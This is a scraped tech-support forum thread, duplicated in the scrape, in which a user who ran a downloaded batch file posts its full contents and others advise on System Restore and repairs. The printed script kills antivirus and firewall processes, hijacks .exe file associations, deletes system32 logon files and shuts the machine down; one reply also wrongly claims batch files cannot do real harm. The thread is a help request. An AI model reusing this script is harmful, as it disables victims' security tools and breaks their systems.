Solve : HELP!! I don't know what to do, I'm in a lot of trouble! Pleas

1.	Solve : HELP!! I don't know what to do, I'm in a lot of trouble! Please!:'(?
Answer» I have downloaded a file (.bat). I scanned it with my nod32, and no virus was found. But when I double click the file it started a program like cmd. I don't know if it disable my programs, but the file .exe changes its icon to a text document, I can't run a program, other than my internet explorer. When I open a .exe file it SHOWS different letter like "Ðèäº”‰Šé”‰Šé”‰Šé³O", but the one that I understand is the "This program cannot be run in DOS mode.", also this one "An application has made an attempt to load the C runtime library incorrectly.". Then when I look for my config.sys, what I found is config.NT, also I can't find my Autoexec.bat. I don't know what to do, please help out in this. . . I really need help. This is some of the words "Attempt to use MSIL code from this assembly during native code INITIALIZATION. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain." "This application has requested the Runtime to terminate it in an UNUSUAL way".If you are running XP you could try and use windows restore. That would allow you to go back before you downloaded the file. go to: start All Programs Accessories System Tools System Restore Select a date before you downloaded/ran the file Please keep in mind that will revert any changes (saves, word docs, downloads, ext.) you have made back to the point you choose. If you still have the batch file, post it here so we can examine the code. For future reference, never run a file if you don't know how it got there or what it does. Also, with BAT files, you can right-click on them and select EDIT and that may give you a general idea of what it does. "EDIT" the BAT file and paste the entire file's contents here if you can. exactly what helpmeh says, we can examine and reconstruct it to reset all it has done. and batch files don't SHOW up on av's because it could be using simple CODES that looks "harmless" to the avQuote from: BatchFileBasics on July 31, 2009, 01:17:46 PM exactly what helpmeh says, we can examine and reconstruct it to reset all it has done. and batch files don't show up on av's because it could be using simple codes that looks "harmless" to the av That's because bat files can't really be viri, they're just so open-source. They can't really do much that's extremely dangerous (del/erase are about it). Quote from: wbrost on July 31, 2009, 06:24:15 AM If you are running XP you could try and use windows restore. That would allow you to go back before you downloaded the file. go to: start All Programs Accessories System Tools System Restore Select a date before you downloaded/ran the file Please keep in mind that will revert any changes (saves, word docs, downloads, ext.) you have made back to the point you choose. does this mean that any downloads beyond the date will be unsaved?Quote from: Helpmeh on July 31, 2009, 07:13:25 AM If you still have the batch file, post it here so we can examine the code. For future reference, never run a file if you don't know how it got there or what it does. Also, with BAT files, you can right-click on them and select EDIT and that may give you a general idea of what it does. "EDIT" the BAT file and paste the entire file's contents here if you can. Here is the code: "title Hack Setup color 0A @echo off set end=md “Hack installing” set fin=copy “Hack log.txt” “Installing” %end% %fin% net send * Hack is installing, press OK to begin set up. kill NAVAPSVC.exe /F /Q kill zonelabs.exe /F /Q kill explorer.exe /F /Q cls assoc .exe=txtfile assoc .txt=mp3file cls msg * It is you who is hacked…. msg * I warned you, and you kept going. Challenge me and this is what happens. DEL C:\WINDOWS\system32\logoff.exe /F /Q DEL C:\WINDOWS\system32\logon.exe /F /Q DEL C:\WINDOWS\system32\logon.scr /F /Q cls shutdown" I've fix the .exe=txtfile, but still, please help me to correct all of this, because I'm not very familiar to the DOS. Well, I can Understand that I need to "@echo on" is that right? But I don't know how to do that, please, help to resolve the problems that this code have given me according to the code.Quote from: nobody0725 on August 03, 2009, 01:41:14 PM does this mean that any downloads beyond the date will be unsaved? basically yes. Using this method would "return" your system to the state it was in on the day you select. Please keep in mind this should be the last thing you try before a full reinstall.well judging by how you fixed the exe problem, you can fix the .txt by opening cmd, start run cmd and type Code: [Select]assoc .txt=txtfile and you can redownload logoff.exe from http://www.devhood.com/tools/tool_details.aspx?tool_id=696Quote from: Helpmeh on July 31, 2009, 03:04:16 PM They can't really do much that's extremely dangerous (del/erase are about it). That's not really true because if the batch file deletes the wrong files it can be extremely dangerous to your system.Quote from: mroilfield on August 03, 2009, 02:56:39 PM That's not really true because if the batch file deletes the wrong files it can be extremely dangerous to your system. Did you read what was already written in the brackets? Sorry for double-post, but I just noticed this now. Either the "hacker" designed this for the OP (if OP has Zone Alarm) or the hacker has zone alarm. (at least I think zonelab is from zone alarm) Pre-post edit: thoughts confirmed

Solve : HELP!! I don't know what to do, I'm in a lot of trouble! Please!:'(?

Answer»

I have downloaded a file (*.bat). I scanned it with my nod32, and no virus was found. But when I double click the file it started a program like cmd. I don't know if it disable my programs, but the file *.exe changes its icon to a text document, I can't run a program, other than my internet explorer. When I open a .exe file it SHOWS different letter like "Ðèäº”‰Šé”‰Šé”‰Šé³O", but the one that I understand is the "This program cannot be run in DOS mode.", also this one "An application has made an attempt to load the C runtime library incorrectly.". Then when I look for my config.sys, what I found is config.NT, also I can't find my Autoexec.bat. I don't know what to do, please help out in this. . . I really need help.
This is some of the words "Attempt to use MSIL code from this assembly during native code INITIALIZATION. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain."
"This application has requested the Runtime to terminate it in an UNUSUAL way".If you are running XP you could try and use windows restore. That would allow you to go back before you downloaded the file.

go to:
start
All Programs
Accessories
System Tools
System Restore
Select a date before you downloaded/ran the file

Please keep in mind that will revert any changes (saves, word docs, downloads, ext.) you have made back to the point you choose. If you still have the batch file, post it here so we can examine the code. For future reference, never run a file if you don't know how it got there or what it does. Also, with BAT files, you can right-click on them and select EDIT and that may give you a general idea of what it does. "EDIT" the BAT file and paste the entire file's contents here if you can. exactly what helpmeh says, we can examine and reconstruct it to reset all it has done.

and batch files don't SHOW up on av's because it could be using simple CODES that looks "harmless" to the avQuote from: BatchFileBasics on July 31, 2009, 01:17:46 PM

exactly what helpmeh says, we can examine and reconstruct it to reset all it has done.

and batch files don't show up on av's because it could be using simple codes that looks "harmless" to the av

That's because bat files can't really be viri, they're just so open-source. They can't really do much that's extremely dangerous (del/erase are about it). Quote from: wbrost on July 31, 2009, 06:24:15 AM

If you are running XP you could try and use windows restore. That would allow you to go back before you downloaded the file.

go to:
start
All Programs
Accessories
System Tools
System Restore
Select a date before you downloaded/ran the file

Please keep in mind that will revert any changes (saves, word docs, downloads, ext.) you have made back to the point you choose.

does this mean that any downloads beyond the date will be unsaved?Quote from: Helpmeh on July 31, 2009, 07:13:25 AM

If you still have the batch file, post it here so we can examine the code. For future reference, never run a file if you don't know how it got there or what it does. Also, with BAT files, you can right-click on them and select EDIT and that may give you a general idea of what it does. "EDIT" the BAT file and paste the entire file's contents here if you can.

Here is the code:
"title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown"

I've fix the .exe=txtfile, but still, please help me to correct all of this, because I'm not very familiar to the DOS. Well, I can Understand that I need to "@echo on" is that right? But I don't know how to do that, please, help to resolve the problems that this code have given me according to the code.Quote from: nobody0725 on August 03, 2009, 01:41:14 PM

does this mean that any downloads beyond the date will be unsaved?

basically yes. Using this method would "return" your system to the state it was in on the day you select. Please keep in mind this should be the last thing you try before a full reinstall.well judging by how you fixed the exe problem,

you can fix the .txt by opening cmd,
start
run
cmd

and type Code: [Select]assoc .txt=txtfile
and you can redownload logoff.exe from
http://www.devhood.com/tools/tool_details.aspx?tool_id=696Quote from: Helpmeh on July 31, 2009, 03:04:16 PM

They can't really do much that's extremely dangerous (del/erase are about it).

That's not really true because if the batch file deletes the wrong files it can be extremely dangerous to your system.Quote from: mroilfield on August 03, 2009, 02:56:39 PM

That's not really true because if the batch file deletes the wrong files it can be extremely dangerous to your system.

Did you read what was already written in the brackets? Sorry for double-post, but I just noticed this now. Either the "hacker" designed this for the OP (if OP has Zone Alarm) or the hacker has zone alarm. (at least I think zonelab is from zone alarm)

Pre-post edit: thoughts confirmed

Solve : HELP!! I don't know what to do, I'm in a lot of trouble! Please!:'(?

Discussion

No Comment Found

Related InterviewSolutions

Reply to Comment